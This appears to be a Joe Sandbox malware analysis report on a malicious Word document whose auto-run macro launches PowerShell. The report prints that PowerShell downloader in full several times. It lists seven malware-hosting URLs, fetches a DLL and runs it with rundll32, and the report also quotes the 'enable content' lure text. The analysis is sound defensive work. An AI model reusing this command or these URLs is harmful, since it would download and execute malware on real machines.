Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report 1711.doc

Overview

General Information

Sample Name:1711.doc
Analysis ID:526179
MD5:85ab297345c97bca1a5004dc537f6c1c
SHA1:0b609d0b86f1b29410451306c173c7fac013d5a7
SHA256:31daa06dc4c4f5dda5e557e8422d9b31655b1322e610bb42096a2a060727927d
Infos:

Most interesting Screenshot:

Detection

Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Multi AV Scanner detection for submitted file
Antivirus detection for URL or domain
Document contains an embedded VBA macro which may execute processes
Obfuscated command line found
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document exploit detected (process start blacklist hit)
Suspicious powershell command line found
Document contains no OLE stream with summary information
Queries the volume information (name, serial number etc) of a device
Yara signature match
Document has an unknown application name
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to detect virtual machines (SLDT)
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Sigma detected: Windows Suspicious Use Of Web Request in CommandLine
Creates a process in suspended mode (likely to inject code)
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Enables debug privileges

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 2640 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • cmd.exe (PID: 2632 cmdline: "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • powershell.exe (PID: 2840 cmdline: powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj MD5: 852D67A27E454BD389FA7F02A8CBE23F)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\~DFF0F57547FC904286.TMPSUSP_VBA_FileSystem_AccessDetects suspicious VBA that writes to disk and is activated on document openFlorian Roth
  • 0xa7c8:$s1: \Common Files\Microsoft Shared\
  • 0xab20:$s1: \Common Files\Microsoft Shared\
  • 0x3f5a:$s2: Scripting.FileSystemObject
  • 0x52a1:$a1: Document_Open
  • 0x9cb3:$a1: Document_Open
  • 0xb19d:$a1: Document_Open
  • 0xcac1:$a1: Document_Open

Sigma Overview

System Summary:

barindex
Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, CommandLine: "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2640, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, ProcessId: 2632
Sigma detected: Windows Suspicious Use Of Web Request in CommandLineShow sources
Source: Process startedAuthor: James Pemberton / @4A616D6573: Data: Command: "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, CommandLine: "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2640, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, ProcessId: 2632
Sigma detected: Non Interactive PowerShellShow sources
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, CommandLine: powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2632, ProcessCommandLine: powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for submitted fileShow sources
Source: 1711.docVirustotal: Detection: 39%Perma Link
Source: 1711.docMetadefender: Detection: 20%Perma Link
Source: 1711.docReversingLabs: Detection: 57%
Antivirus detection for URL or domainShow sources
Source: http://itomsystem.in/i9eg3y/nNxmmn9aTcv/PAvira URL Cloud: Label: malware
Source: http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/Avira URL Cloud: Label: malware
Source: http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/Avira URL Cloud: Label: malware
Source: https://staviancjs.com/wp-forum/QOm4n2/Avira URL Cloud: Label: malware
Source: http://itomsystem.in/i9eg3y/nNxmmn9aTcv/Avira URL Cloud: Label: malware
Source: http://itomsystem.in/i9eg3y/nNxmmn9aTcv/PEAvira URL Cloud: Label: malware
Source: http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/Avira URL Cloud: Label: malware
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.427339359.0000000002A67000.00000004.00000040.sdmp
Source: Binary string: System.Management.Automation.pdbBB source: powershell.exe, 00000004.00000002.427339359.0000000002A67000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb=C:\ source: powershell.exe, 00000004.00000002.427339359.0000000002A67000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbamDa source: powershell.exe, 00000004.00000002.427339359.0000000002A67000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb:\Pr source: powershell.exe, 00000004.00000002.427339359.0000000002A67000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.427339359.0000000002A67000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.427339359.0000000002A67000.00000004.00000040.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

Software Vulnerabilities:

barindex
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe
Source: powershell.exe, 00000004.00000002.430534978.0000000003AB5000.00000004.00000001.sdmp, powershell.exe, 00000004.00000002.429788258.0000000003607000.00000004.00000001.sdmpString found in binary or memory: http://alfadandoinc.com/67oyp/C2J2KyCpQn
Source: powershell.exe, 00000004.00000002.429788258.0000000003607000.00000004.00000001.sdmpString found in binary or memory: http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/
Source: powershell.exe, 00000004.00000002.429788258.0000000003607000.00000004.00000001.sdmpString found in binary or memory: http://alfadandoinc.com/67oyp/C2h
Source: powershell.exe, 00000004.00000002.429788258.0000000003607000.00000004.00000001.sdmpString found in binary or memory: http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/
Source: powershell.exe, 00000004.00000002.427979783.000000000320B000.00000004.00000001.sdmpString found in binary or memory: http://itomsystem.in/i9eg3y/nN
Source: powershell.exe, 00000004.00000002.429788258.0000000003607000.00000004.00000001.sdmpString found in binary or memory: http://itomsystem.in/i9eg3y/nNxmmn9aTcv/
Source: powershell.exe, 00000004.00000002.427629821.0000000002E7C000.00000004.00000001.sdmpString found in binary or memory: http://itomsystem.in/i9eg3y/nNxmmn9aTcv/P
Source: powershell.exe, 00000004.00000002.429788258.0000000003607000.00000004.00000001.sdmpString found in binary or memory: http://itomsystem.in/i9eg3y/nNxmmn9aTcv/PE
Source: powershell.exe, 00000004.00000002.426788462.0000000002230000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: powershell.exe, 00000004.00000002.429788258.0000000003607000.00000004.00000001.sdmpString found in binary or memory: http://thepilatesstudionj.com/wp
Source: powershell.exe, 00000004.00000002.427979783.000000000320B000.00000004.00000001.sdmpString found in binary or memory: http://thepilatesstudionj.com/wp-content/oAx5UoQm
Source: powershell.exe, 00000004.00000002.429788258.0000000003607000.00000004.00000001.sdmpString found in binary or memory: http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/
Source: powershell.exe, 00000004.00000002.426788462.0000000002230000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
Source: powershell.exe, 00000004.00000002.427979783.000000000320B000.00000004.00000001.sdmpString found in binary or memory: http://www.caboturnup.c
Source: powershell.exe, 00000004.00000002.427979783.000000000320B000.00000004.00000001.sdmpString found in binary or memory: http://www.caboturnup.com/wp-content/p
Source: powershell.exe, 00000004.00000002.427876322.000000000311C000.00000004.00000001.sdmpString found in binary or memory: http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZg
Source: powershell.exe, 00000004.00000002.429788258.0000000003607000.00000004.00000001.sdmpString found in binary or memory: http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/
Source: powershell.exe, 00000004.00000002.427979783.000000000320B000.00000004.00000001.sdmp, powershell.exe, 00000004.00000002.429788258.0000000003607000.00000004.00000001.sdmpString found in binary or memory: https://staviancjs.co
Source: powershell.exe, 00000004.00000002.427979783.000000000320B000.00000004.00000001.sdmpString found in binary or memory: https://staviancjs.com/wp-forum/QOm4
Source: powershell.exe, 00000004.00000002.429788258.0000000003607000.00000004.00000001.sdmpString found in binary or memory: https://staviancjs.com/wp-forum/QOm4n2/
Source: powershell.exe, 00000004.00000002.427979783.000000000320B000.00000004.00000001.sdmpString found in binary or memory: https://yougandan.com/backup
Source: powershell.exe, 00000004.00000002.427979783.000000000320B000.00000004.00000001.sdmpString found in binary or memory: https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNc
Source: powershell.exe, 00000004.00000002.429788258.0000000003607000.00000004.00000001.sdmpString found in binary or memory: https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{52852A70-A935-4D7F-A270-7FCD1CA48619}.tmpJump to behavior

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 4Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 0 Page: I of I Words:
Source: Screenshot number: 4Screenshot OCR: DOCUMENT IS PROTECTED. i Previewing is not available for protected documents. You have to press "E
Source: Screenshot number: 4Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 4Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 0 Page: I of I Words: 0 N@m 13 ;a 10096 G)
Source: Screenshot number: 8Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. Ci 1_| O I I a O I
Source: Screenshot number: 8Screenshot OCR: DOCUMENT IS PROTECTED. U Previewing is not available for protected documents. m You have to pres
Source: Screenshot number: 8Screenshot OCR: protected documents. m You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview
Source: Screenshot number: 8Screenshot OCR: ENABLE CONTENT" buttons to preview this document. Ci 1_| O I I a O I @ 100% G) A GE)
Source: Document image extraction number: 0Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 0Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Screenshot number: 12Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. ii: ^ a S O I @
Source: Screenshot number: 12Screenshot OCR: ENABLE CONTENT" buttons to preview this document. ii: ^ a S O I @ 100% G) A GE)
Document contains an embedded VBA macro which may execute processesShow sources
Source: VBA code instrumentationOLE, VBA macro: Module bvkaeiku2ncoi2uho3ihdes, Function dgfjalfhkaugwikgfuol3wgnacoi3u5taboi3ut5roai3u5go3wugaolisdrgfso8i7wejwdoljgf, API IWshShell3.Run("cmd.exe /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj",0:Integer)
Source: ~DFF0F57547FC904286.TMP.0.drOLE, VBA macro line: JbxHook_Run_2__ob = jbxthis.Run(jbxparam0, jbxparam1)
Source: 1711.docOLE indicator has summary info: false
Source: ~WRF{E3844549-3F78-457B-BAEF-06FBD2156752}.tmp.0.drOLE indicator has summary info: false
Source: ~DFF0F57547FC904286.TMP.0.drOLE indicator has summary info: false
Source: C:\Users\user\AppData\Local\Temp\~DFF0F57547FC904286.TMP, type: DROPPEDMatched rule: SUSP_VBA_FileSystem_Access date = 2019-06-21, author = Florian Roth, description = Detects suspicious VBA that writes to disk and is activated on document open, reference = Internal Research, score = 52262bb315fa55b7441a04966e176b0e26b7071376797e35c80aa60696b6d6fc
Source: 1711.docOLE indicator application name: unknown
Source: ~WRF{E3844549-3F78-457B-BAEF-06FBD2156752}.tmp.0.drOLE indicator application name: unknown
Source: ~DFF0F57547FC904286.TMP.0.drOLE indicator application name: unknown
Source: 1711.docOLE, VBA macro line: Private Sub Document_Open()
Source: VBA code instrumentationOLE, VBA macro: Module bvkaeiku2ncoi2uho3ihdes, Function Document_Open
Source: ~DFF0F57547FC904286.TMP.0.drOLE, VBA macro line: Private Function JbxHook_Open_3__ob_set(jbxline, ByRef jbxthis, ByRef jbxparam0, ByRef jbxparam1, ByRef jbxparam2)
Source: ~DFF0F57547FC904286.TMP.0.drOLE, VBA macro line: Static jbxtresh_Open As Integer
Source: ~DFF0F57547FC904286.TMP.0.drOLE, VBA macro line: If jbxtresh_Open < 200 Then
Source: ~DFF0F57547FC904286.TMP.0.drOLE, VBA macro line: Set JbxHook_Open_3__ob_set = jbxthis.Open(jbxparam0, jbxparam1, jbxparam2)
Source: ~DFF0F57547FC904286.TMP.0.drOLE, VBA macro line: If jbxtresh_Open < 200 Then
Source: ~DFF0F57547FC904286.TMP.0.drOLE, VBA macro line: jbxtresh_Open = jbxtresh_Open + 1
Source: ~DFF0F57547FC904286.TMP.0.drOLE, VBA macro line: JbxLogParam "jbxreturn", JbxHook_Open_3__ob_set
Source: ~DFF0F57547FC904286.TMP.0.drOLE, VBA macro line: Set WB = JbxHook_Open_3__ob_set(28, Workbooks, FileName, False, True)
Source: ~DFF0F57547FC904286.TMP.0.drOLE, VBA macro line: Private Sub Document_Open()
Source: 1711.docOLE indicator, VBA macros: true
Source: ~DFF0F57547FC904286.TMP.0.drOLE indicator, VBA macros: true
Source: ~WRF{E3844549-3F78-457B-BAEF-06FBD2156752}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~DFF0F57547FC904286.TMP.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: 1711.docVirustotal: Detection: 39%
Source: 1711.docMetadefender: Detection: 20%
Source: 1711.docReversingLabs: Detection: 57%
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..................l.....#.........................l.....................`I.........v.....................K......................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#................Hxk....................................}..v....8.......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../................Ixk......M.............................}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../................Hxk....................................}..v....8.......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;................Ixk......M.............................}..v............0.......................~.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;................Hxk....X...............................}..v............0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.2.1.............}..v............0...............8.M.....$.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G................Hxk....................................}..v.... .......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S................Ixk......M.............................}..v............0...............................................
